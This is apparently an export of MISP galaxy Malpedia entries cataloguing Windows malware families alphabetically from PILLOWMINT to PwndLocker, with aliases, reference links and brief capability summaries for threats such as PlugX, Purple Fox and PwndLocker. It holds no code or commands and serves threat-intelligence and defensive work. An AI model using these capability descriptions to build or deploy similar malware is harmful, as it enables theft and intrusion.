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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pierogi">https://malpedia.caad.fkie.fraunhofer.de/details/win.pierogi</a></td>
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</table>

**PILLOWMINT**

According to FireEye, PILLOWMINT is a Point-of-Sale malware tool used to scrape track 1 and track 2 payment card data from memory. Scraped payment card data is encrypted and stored in the registry and as plaintext in a file (T1074: Data Staged) Contains additional backdoor capabilities including: Running processes Downloading and executing files (T1105: Remote File Copy) Downloading and injecting DLLs (T1055: Process Injection) Communicates with a command and control (C2) server over HTTP using AES encrypted messages (T1071: Standard Application Layer Protocol) (T1032: Standard Cryptographic Protocol)

The tag is: `misp-galaxy:malpedia="PILLOWMINT"`

**PILLOWMINT is also known as:**

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pipcreat

The tag is: `misp-galaxy:malpedia="pipcreat"`

pipcreat is also known as:

Table 2251. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat">https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat</a></td>
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<tr>
<td><a href="https://www.snort.org/rule_docs/1-26941">https://www.snort.org/rule_docs/1-26941</a></td>
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pirpi

The tag is: `misp-galaxy:malpedia="pirpi"`

pirpi is also known as:

- CookieCutter
- SHOTTUP

Table 2252. Table References

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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-mayfair">https://www.secureworks.com/research/threat-profiles/bronze-mayfair</a></td>
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</table>

Pitou

The tag is: `misp-galaxy:malpedia="Pitou"`

Pitou is also known as:
### PittyTiger RAT

The tag is: `misp-galaxy:malpedia="PittyTiger RAT"`

PittyTiger RAT is also known as:

### Pkybot

Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.

The tag is: `misp-galaxy:malpedia="Pkybot"`

Pkybot is also known as:

- Bublik
- Pykbot
- TBag
PLAINTEE

The tag is: `misp-galaxy:malpedia="PLAINTEE"`

PLAINTEE is also known as:

Table 2256. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee">https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-overbrook">https://www.secureworks.com/research/threat-profiles/bronze-overbrook</a></td>
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playwork

The tag is: `misp-galaxy:malpedia="playwork"`

playwork is also known as:

Table 2257. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork">https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork</a></td>
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</table>

PLEAD (Windows)

PLEAD is a RAT used by the actor BlackTech. FireEye uses the synonyms GOODTIMES for the RAT module and DRAWDOWN for the respective downloader.

The tag is: `misp-galaxy:malpedia="PLEAD (Windows)"`

PLEAD (Windows) is also known as:

- DRAWDOWN
- GOODTIMES
- Linopid

Table 2258. Table References

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<td><a href="https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html">https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html</a></td>
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Ploutus ATM

The tag is: misp-galaxy:malpedia="Ploutus ATM"

Ploutus ATM is also known as:

Table 2259. Table References

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ployx

The tag is: `misp-galaxy:malpedia="ployx"`

ployx is also known as:

Table 2260. Table References

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<tr>
<td><a href="https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html">https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html</a></td>
</tr>
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</table>

PlugX

RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.

Notable features of this malware family are the ability to execute commands on the affected machine to retrieve: machine information capture the screen send keyboard and mouse events keylogging reboot the system manage processes (create, kill and enumerate) manage services (create, start, stop, etc.); and manage Windows registry entries, open a shell, etc.

The malware also logs its events in a text log file.

The tag is: `misp-galaxy:malpedia="PlugX"`

PlugX is also known as:

- Destroy RAT
- Kaba
- Korplug
- Sogu
- TIGERPLUG
### Table 2261. Table References

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<td><a href="https://community.rsa.com/thread/185439">https://community.rsa.com/thread/185439</a></td>
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<td><a href="https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt">https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt</a></td>
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<td><a href="https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/">https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/</a></td>
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<td><a href="https://threatconnect.com/blog/research-roundup-activity-on-previouslly-identified-apt33-domains/">https://threatconnect.com/blog/research-roundup-activity-on-previouslly-identified-apt33-domains/</a></td>
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<td><a href="https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn">https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html">https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-firestone">https://www.secureworks.com/research/threat-profiles/bronze-firestone</a></td>
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<td><a href="http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html">http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-olive">https://www.secureworks.com/research/threat-profiles/bronze-olive</a></td>
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<td><a href="http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html">http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html</a></td>
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https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
https://www.secureworks.com/research/bronze-president-targets-ngos
https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/
https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape
https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/
https://blog.ensilo.com/uncovering-new-activity-by-apt10
https://www.secureworks.com/research/threat-profiles/bronze-riverside
https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/
https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/
https://securelist.com/time-of-death-connected-medicine/84315/
https://www.secureworks.com/research/threat-profiles/bronze-express
Plurox

The tag is: `misp-galaxy:malpedia="Plurox"`

Plurox is also known as:

Table 2262. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox">https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox</a></td>
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<td><a href="https://securelist.com/plurox-modular-backdoor/91213/">https://securelist.com/plurox-modular-backdoor/91213/</a></td>
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pngdowner

The tag is: `misp-galaxy:malpedia="pngdowner"`

pngdowner is also known as:

Table 2263. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner">https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner</a></td>
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<tr>
<td><a href="https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cfd5b064ce2a1a31">https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cfd5b064ce2a1a31</a></td>
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</table>

PocoDown

uses POCO C++ cross-platform library, Xor-based string obfuscation, SSL library code and string overlap with Xtunnel, infrastructure overlap with X-Agent, probably in use since mid-2018

The tag is: `misp-galaxy:malpedia="PocoDown"`

PocoDown is also known as:

• Blitz
• PocoDownloader

Table 2264. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown">https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown</a></td>
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<td><a href="https://twitter.com/cyb3rops/status/1129653190444703744">https://twitter.com/cyb3rops/status/1129653190444703744</a></td>
</tr>
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</table>
poisonplug

According to FireEye, POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded C&C commands.

The tag is: misp-galaxy:malpedia="poisonplug"

poisonplug is also known as:

• Barlaiy

Table 2265. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug
https://content.fireeye.com/apt-41/rpt-apt41/
https://securelist.com/apt-trends-report-q3-2020/99204/

Poison Ivy

The tag is: misp-galaxy:malpedia="Poison Ivy"

Poison Ivy is also known as:

• SPIVY
• pivy
• poisonivy

Table 2266. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy
Poison RAT

The tag is: misp-galaxy:malpedia="Poison RAT"

Poison RAT is also known as:

Table 2267. Table References

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Poldat

The tag is: misp-galaxy:malpedia="Poldat"

Poldat is also known as:

- KABOB
- Zlib

Table 2268. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat">https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat</a></td>
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PolyglotDuke

The tag is: misp-galaxy:malpedia="PolyglotDuke"

PolyglotDuke is also known as:
Table 2269. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke">https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke</a></td>
</tr>
<tr>
<td><a href="https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/">https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/</a></td>
</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/">https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/iron-hemlock">https://www.secureworks.com/research/threat-profiles/iron-hemlock</a></td>
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**Polyglot**

The tag is: *misp-galaxy:malpedia=*Polyglot*

Polyglot is also known as:

Table 2270. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/">https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/</a></td>
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**Pony**

The tag is: *misp-galaxy:malpedia=*Pony*

Pony is also known as:

- Fareit
- Siplog

Table 2271. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pony">https://malpedia.caad.fkie.fraunhofer.de/details/win.pony</a></td>
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<tr>
<td><a href="http://www.secureworks.com/research/threat-profiles/gold-essex">http://www.secureworks.com/research/threat-profiles/gold-essex</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=EyDiIAtdl%5Bhttps://www.youtube.com/watch?v=EyDiIAtdl">https://www.youtube.com/watch?v=EyDiIAtdl[https://www.youtube.com/watch?v=EyDiIAtdl</a>]</td>
</tr>
<tr>
<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
</tr>
<tr>
<td><a href="https://www.uperlesia.com/analysis-of-a-packed-pony-downloader">https://www.uperlesia.com/analysis-of-a-packed-pony-downloader</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-evergreen">https://www.secureworks.com/research/threat-profiles/gold-evergreen</a></td>
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<tr>
<td><a href="https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/">https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/</a></td>
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PoohMilk Loader

The tag is: misp-galaxy:malpedia="PoohMilk Loader"

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Table 2272. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk">https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk</a></td>
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PoorWeb

The tag is: misp-galaxy:malpedia="PoorWeb"

PoorWeb is also known as:

Table 2273. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.poorweb">https://malpedia.caad.fkie.fraunhofer.de/details/win.poorweb</a></td>
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<tr>
<td><a href="https://fortiguard.com/resources/threat-brief/2019/05/10/fortiguard-threat-intelligence-brief-may-10-2019">https://fortiguard.com/resources/threat-brief/2019/05/10/fortiguard-threat-intelligence-brief-may-10-2019</a></td>
</tr>
<tr>
<td><a href="https://asec.ahnlab.com/ko/18796/">https://asec.ahnlab.com/ko/18796/</a></td>
</tr>
<tr>
<td><a href="https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats">https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats</a></td>
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Popcorn Time

The tag is: misp-galaxy:malpedia="Popcorn Time"

Popcorn Time is also known as:

Table 2274. Table References
portless

The tag is: misp-galaxy:malpedia="portless"

portless is also known as:

Table 2275. Table References

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poscardstealer

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Table 2276. Table References

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PoshC2

The tag is: misp-galaxy:malpedia="PoshC2"

PoshC2 is also known as:

Table 2277. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2">https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-trinity">https://www.secureworks.com/research/threat-profiles/cobalt-trinity</a></td>
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<td><a href="https://paper.seebug.org/1301/">https://paper.seebug.org/1301/</a></td>
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<td><a href="https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md">https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md</a></td>
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PoSlurp

The tag is: `misp-galaxy:malpedia="PoSlurp"`

PoSlurp is also known as:

- PUNCHTRACK

**Table 2278. Table References**

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<tr>
<td><a href="https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/">https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/</a></td>
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<tr>
<td><a href="https://twitter.com/just_windex/status/1162118585805758464">https://twitter.com/just_windex/status/1162118585805758464</a></td>
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Poulight Stealer

The tag is: `misp-galaxy:malpedia="Poulight Stealer"`

Poulight Stealer is also known as:

- Poulight

**Table 2279. Table References**

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20">https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20</a></td>
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Poweliks

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Poweliks is also known as:

Table 2280. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks">https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks</a></td>
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<tr>
<td><a href="https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users">https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users</a></td>
</tr>
<tr>
<td><a href="https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/">https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/</a></td>
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</tbody>
</table>

**POWERBAND**

*NET variant of ps1.powerton.*

The tag is: *misp-galaxy:malpedia=“POWERBAND”*

POWERBAND is also known as:

Table 2281. Table References

<table>
<thead>
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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.powerband">https://malpedia.caad.fkie.fraunhofer.de/details/win.powerband</a></td>
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<tr>
<td><a href="https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/">https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/</a></td>
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**PowerCat**

The tag is: *misp-galaxy:malpedia=“PowerCat”*

PowerCat is also known as:

Table 2282. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat">https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat</a></td>
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<tr>
<td><a href="https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/">https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/VK_Intel/status/1141540229951709184">https://twitter.com/VK_Intel/status/1141540229951709184</a></td>
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**PowerDuke**

The tag is: *misp-galaxy:malpedia=“PowerDuke”*

PowerDuke is also known as:

Table 2283. Table References

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**powerkatz**

The tag is: `misp-galaxy:malpedia="powerkatz"`

powerkatz is also known as:

*Table 2284. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.powerkatz">https://malpedia.caad.fkie.fraunhofer.de/details/win.powerkatz</a></td>
</tr>
<tr>
<td><a href="https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/">https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/</a></td>
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**PowerLoader**

The tag is: `misp-galaxy:malpedia="PowerLoader"`

PowerLoader is also known as:

*Table 2285. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader">https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader</a></td>
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**PowerPool**

The tag is: `misp-galaxy:malpedia="PowerPool"`

PowerPool is also known as:

*Table 2286. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool">https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool</a></td>
</tr>
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</table>

**PowerShellRunner**

The tag is: `misp-galaxy:malpedia="PowerShellRunner"`

PowerShellRunner is also known as:
**Powersniff**

A malware of the gozi group, developed on the base of isfb. It uses Office Macros and PowerShell in documents distributed in e-mail messages.

The tag is: *misp-galaxy:malpedia="Powersniff"*

Powersniff is also known as:

- PUNCHBUGGY

**PowerRatankba**

QUICKRIDE.POWER is a PowerShell variant of the QUICKRIDE backdoor. Its payloads are often saved to C:\windows\temp\.

The tag is: *misp-galaxy:malpedia="PowerRatankba"*

PowerRatankba is also known as:

- QUICKRIDE.POWER
**prb_backdoor**

The tag is: *misp-galaxy:malpedia=*“prb_backdoor”*

prb_backdoor is also known as:

*Table 2290. Table References*

<table>
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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor">https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor</a></td>
</tr>
<tr>
<td><a href="https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html">https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html</a></td>
</tr>
</tbody>
</table>

**Predator The Thief**

Predator is a feature-rich information stealer. It is sold on hacking forums as a bundle which includes: Payload builder and Command and Control web panel. It is able to grab passwords from browsers, replace cryptocurrency wallets, and take photos from the web-camera. It is developed by using a modular approach so that criminals may add more sophisticated tools on top of the it.

The tag is: *misp-galaxy:malpedia=*“Predator The Thief”*

Predator The Thief is also known as:

*Table 2291. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.predator">https://malpedia.caad.fkie.fraunhofer.de/details/win.predator</a></td>
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<td><a href="https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/">https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/</a></td>
</tr>
<tr>
<td><a href="https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/">https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/a-predatory-tale/89779">https://securelist.com/a-predatory-tale/89779</a></td>
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</table>
Prikormka
The tag is: misp-galaxy:malpedia="Prikormka"

Prikormka is also known as:

Table 2292. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka

Prilex
The tag is: misp-galaxy:malpedia="Prilex"

Prilex is also known as:

Table 2293. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex
https://www.kaspersky.com/blog/chip-n-pin-cloning/21502

PrincessLocker
The tag is: misp-galaxy:malpedia="PrincessLocker"

PrincessLocker is also known as:

Table 2294. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker
**Project Hook POS**

The tag is: `misp-galaxy:malpedia="Project Hook POS"`

Project Hook POS is also known as:

*Table 2295. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.project_hook">https://malpedia.caad.fkie.fraunhofer.de/details/win.project_hook</a></td>
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<tr>
<td><a href="https://threatpost.com/dexter-project-hook-pos-malware-campaigns-persist/104655/">https://threatpost.com/dexter-project-hook-pos-malware-campaigns-persist/104655/</a></td>
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**proteus**

The tag is: `misp-galaxy:malpedia="proteus"`

proteus is also known as:

*Table 2296. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.proteus">https://malpedia.caad.fkie.fraunhofer.de/details/win.proteus</a></td>
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<tr>
<td><a href="https://www.fortinet.com/blog/threat-research/a-new-all-in-one-botnet-proteus.html">https://www.fortinet.com/blog/threat-research/a-new-all-in-one-botnet-proteus.html</a></td>
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**ProtonBot**

The tag is: `misp-galaxy:malpedia="ProtonBot"`

ProtonBot is also known as:

*Table 2297. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot</a></td>
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<tr>
<td><a href="https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/">https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/</a></td>
</tr>
</tbody>
</table>

**PsiX**

According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.

In binaries, apart from BotModule and MainModule, references to the following Modules have been observed: BrowserModule BTCModule ComplexModule KeyLoggerModule OutlookModule ProcessModule RansomwareModule SkypeModule

The tag is: `misp-galaxy:malpedia="PsiX"`

PsiX is also known as:
**PSLogger**

The tag is: `misp-galaxy:malpedia="PSLogger"`

PSLogger is also known as:

- ECCENTRICBANDWAGON

**PC Surveillance System**

Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.

The tag is: `misp-galaxy:malpedia="PC Surveillance System"`

PC Surveillance System is also known as:

- PSS
Pteranodon

The tag is: misp-galaxy:malpedia="Pteranodon"

Pteranodon is also known as:

Table 2301. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon">https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon</a></td>
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<tr>
<td><a href="https://www.elastic.co/blog/playing-defense-against-gamaredon-group">https://www.elastic.co/blog/playing-defense-against-gamaredon-group</a></td>
</tr>
<tr>
<td><a href="https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/">https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/</a></td>
</tr>
<tr>
<td><a href="https://blog.threatstop.com/russian-apt-gamaredon-group">https://blog.threatstop.com/russian-apt-gamaredon-group</a></td>
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<tr>
<td><a href="https://cert.gov.ua/news/42">https://cert.gov.ua/news/42</a></td>
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<td><a href="https://cert.gov.ua/news/46">https://cert.gov.ua/news/46</a></td>
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PubNubRAT

The tag is: misp-galaxy:malpedia="PubNubRAT"

PubNubRAT is also known as:

Table 2302. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat">https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat</a></td>
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<td><a href="http://blog.alyac.co.kr/1853">http://blog.alyac.co.kr/1853</a></td>
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Punkey POS

The tag is: misp-galaxy:malpedia="Punkey POS"

Punkey POS is also known as:

- pospunk
punkeypos

Table 2303. Table References

<table>
<thead>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos">https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos</a></td>
</tr>
<tr>
<td><a href="https://www.pandasecurity.com/mediacenter/malware/punkeypos/">https://www.pandasecurity.com/mediacenter/malware/punkeypos/</a></td>
</tr>
</tbody>
</table>

**pupy (Windows)**

Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.

The tag is: `misp-galaxy:malpedia="pupy (Windows)"

pupy (Windows) is also known as:

• Patpoopy

Table 2304. Table References

<table>
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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy">https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy</a></td>
</tr>
<tr>
<td><a href="https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage">https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage</a></td>
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<tr>
<td><a href="https://github.com/n1nj4sec/pupy">https://github.com/n1nj4sec/pupy</a></td>
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<tr>
<td><a href="https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations">https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations</a></td>
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<td><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/">https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/</a></td>
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</table>
**PureLocker**

ransomware

The tag is: `misp-galaxy:malpedia="PureLocker"`

PureLocker is also known as:

Table 2305. Table References

<table>
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<tr>
<td><a href="https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md">https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md</a></td>
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<td><a href="https://exchange.xforce.ibmcloud.com/collection/99c7156c70e1d8e1687ab7dadc8c0e">https://exchange.xforce.ibmcloud.com/collection/99c7156c70e1d8e1687ab7dadc8c0e</a></td>
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</table>

**win.purplefox**

Purple Fox uses msi.dll function, 'MsiInstallProductA', to download and execute its payload. The payload is a .msi file that contains encrypted shellcode including 32-bit and 64-bit versions. Once executed the system will be restarted and uses the 'PendingFileRenameOperations' registry to rename it's components.

Upon restart the rootkit capability of Purple Fox is invoked. It creates a suspended svchost process and injects a DLL that will create a driver with the rootkit capability.

The latest version of Purple Fox abuses open-source code to enable it's rootkit components, which includes hiding and protecting its files and registry entries. It also abuses a file utility software to hide its DLL component, which deters reverse engineering.

The tag is: `misp-galaxy:malpedia="win.purplefox"`

win.purplefox is also known as:

Table 2306. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox">https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox</a></td>
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**PurpleWave**

The tag is: `misp-galaxy:malpedia="PurpleWave"`
PurpleWave is also known as:

Table 2307. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave">https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave</a></td>
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</table>

**Pushdo**

Pushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.

The tag is: misp-galaxy:malpedia="Pushdo"

Pushdo is also known as:

Table 2308. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo">https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo</a></td>
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<td><a href="http://www.secureworks.com/research/threat-profiles/gold-essex">http://www.secureworks.com/research/threat-profiles/gold-essex</a></td>
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<td><a href="https://www.blueliv.com/research/tracking-the-footprints-of-pushdo-trojan/">https://www.blueliv.com/research/tracking-the-footprints-of-pushdo-trojan/</a></td>
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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-essex">https://www.secureworks.com/research/threat-profiles/gold-essex</a></td>
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<td><a href="http://malware-traffic-analysis.net/2017/04/03/index2.html">http://malware-traffic-analysis.net/2017/04/03/index2.html</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/pushdo">https://www.secureworks.com/research/pushdo</a></td>
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**Putabmow**

The tag is: misp-galaxy:malpedia="Putabmow"

Putabmow is also known as:

Table 2309. Table References

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PvzOut

The tag is: misp-galaxy:malpedia="PvzOut"

PvzOut is also known as:

Table 2310. Table References

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PwndLocker

PwndLocker is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that their data can be encrypted. Various processes will also be targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders mostly related to Microsoft Windows system files are also ignored. As of March 2020, encrypted files have been observed with the added extensions of .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user’s desktop.

The tag is: misp-galaxy:malpedia="PwndLocker"

PwndLocker is also known as:

- ProLock

Table 2311. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker</a></td>
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<td><a href="https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/">https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/</a></td>
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<td><a href="https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html">https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html</a></td>
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<td><a href="https://www.intrinsec.com/egregor-prolock/">https://www.intrinsec.com/egregor-prolock/</a></td>
